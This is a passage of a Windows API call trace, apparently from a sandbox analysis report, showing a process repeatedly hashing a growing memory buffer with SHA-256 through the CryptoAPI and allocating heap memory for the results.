	[0154.869] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.870] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.870] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0xe20, dwFlags=0x0) returned 1
	[0154.870] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.870] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230d618
	[0154.870] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230d618, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230d618, pdwDataLen=0x128aac) returned 1
	[0154.870] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.870] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.870] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.870] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.870] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0xe40, dwFlags=0x0) returned 1
	[0154.870] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.870] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230d640
	[0154.870] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x230d640, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230d640, pdwDataLen=0x128aac) returned 1
	[0154.870] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.870] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.870] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.871] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.871] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0xe60, dwFlags=0x0) returned 1
	[0154.871] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.871] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230d668
	[0154.871] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230d668, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230d668, pdwDataLen=0x128aac) returned 1
	[0154.871] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.871] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.871] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.871] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.871] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0xe80, dwFlags=0x0) returned 1
	[0154.871] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.871] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230d690
	[0154.871] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x230d690, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230d690, pdwDataLen=0x128aac) returned 1
	[0154.871] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.871] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.871] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.872] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.872] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0xea0, dwFlags=0x0) returned 1
	[0154.872] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.872] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230d6b8
	[0154.872] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230d6b8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230d6b8, pdwDataLen=0x128aac) returned 1
	[0154.872] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.872] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.872] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.872] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.872] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0xec0, dwFlags=0x0) returned 1
	[0154.872] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.872] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230d6e0
	[0154.872] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x230d6e0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230d6e0, pdwDataLen=0x128aac) returned 1
	[0154.872] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.872] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.872] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.873] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.873] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0xee0, dwFlags=0x0) returned 1
	[0154.873] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.873] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230d708
	[0154.873] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230d708, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230d708, pdwDataLen=0x128aac) returned 1
	[0154.873] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.873] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.873] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.873] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.873] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0xf00, dwFlags=0x0) returned 1
	[0154.873] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.873] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230d730
	[0154.873] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x230d730, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230d730, pdwDataLen=0x128aac) returned 1
	[0154.873] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.874] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.874] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.874] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.874] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0xf20, dwFlags=0x0) returned 1
	[0154.874] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.874] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230d758
	[0154.874] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230d758, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230d758, pdwDataLen=0x128aac) returned 1
	[0154.874] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.874] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.874] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.874] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.874] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0xf40, dwFlags=0x0) returned 1
	[0154.874] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.874] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230d780
	[0154.874] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x230d780, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230d780, pdwDataLen=0x128aac) returned 1
	[0154.875] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.875] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.875] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.875] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.875] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0xf60, dwFlags=0x0) returned 1
	[0154.875] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.875] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230d7a8
	[0154.875] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230d7a8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230d7a8, pdwDataLen=0x128aac) returned 1
	[0154.875] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.875] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.875] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.876] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.876] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0xf80, dwFlags=0x0) returned 1
	[0154.876] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.876] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230d7d0
	[0154.876] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x230d7d0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230d7d0, pdwDataLen=0x128aac) returned 1
	[0154.876] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.876] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.876] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.876] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.876] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0xfa0, dwFlags=0x0) returned 1
	[0154.876] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.877] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230d7f8
	[0154.877] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230d7f8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230d7f8, pdwDataLen=0x128aac) returned 1
	[0154.877] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.877] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.877] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.877] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.877] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0xfc0, dwFlags=0x0) returned 1
	[0154.877] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.877] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230d820
	[0154.877] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x230d820, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230d820, pdwDataLen=0x128aac) returned 1
	[0154.877] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.877] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.877] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.877] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.877] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0xfe0, dwFlags=0x0) returned 1
	[0154.878] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.878] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230d848
	[0154.878] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230d848, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230d848, pdwDataLen=0x128aac) returned 1
	[0154.878] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.878] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.878] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.878] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.878] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x1000, dwFlags=0x0) returned 1
	[0154.878] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.878] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230d870
	[0154.878] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x230d870, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230d870, pdwDataLen=0x128aac) returned 1
	[0154.878] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.878] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.878] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2731588) returned 1
	[0154.879] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x1000) returned 0x2731588
	[0154.879] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.879] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.879] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x20, dwFlags=0x0) returned 1
	[0154.879] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.879] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230d898
	[0154.879] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230d898, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230d898, pdwDataLen=0x128aac) returned 1
	[0154.879] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.879] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.879] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.879] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.879] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x40, dwFlags=0x0) returned 1
	[0154.879] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.879] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230d8c0
	[0154.879] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x230d8c0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230d8c0, pdwDataLen=0x128aac) returned 1
	[0154.880] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.880] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.880] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.880] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.880] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x60, dwFlags=0x0) returned 1
	[0154.880] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.880] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230d8e8
	[0154.880] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230d8e8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230d8e8, pdwDataLen=0x128aac) returned 1
	[0154.880] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.880] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.880] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.880] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.880] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x80, dwFlags=0x0) returned 1
	[0154.880] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.880] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230d910
	[0154.880] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x230d910, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230d910, pdwDataLen=0x128aac) returned 1
	[0154.880] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.881] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.881] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.881] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.881] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0xa0, dwFlags=0x0) returned 1
	[0154.881] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.881] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230d938
	[0154.881] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230d938, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230d938, pdwDataLen=0x128aac) returned 1
	[0154.881] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.881] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.881] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.881] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.881] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0xc0, dwFlags=0x0) returned 1
	[0154.881] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.881] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230d960
	[0154.881] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x230d960, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230d960, pdwDataLen=0x128aac) returned 1
	[0154.881] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.882] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.882] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.882] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.882] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0xe0, dwFlags=0x0) returned 1
	[0154.882] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.882] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230d988
	[0154.882] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230d988, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230d988, pdwDataLen=0x128aac) returned 1
	[0154.882] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.882] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.882] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.882] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.882] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x100, dwFlags=0x0) returned 1
	[0154.882] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.882] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230d9b0
	[0154.882] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x230d9b0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230d9b0, pdwDataLen=0x128aac) returned 1
	[0154.882] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.882] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.883] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.883] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.883] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x120, dwFlags=0x0) returned 1
	[0154.883] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.883] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230d9d8
	[0154.883] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230d9d8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230d9d8, pdwDataLen=0x128aac) returned 1
	[0154.883] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.883] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.883] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
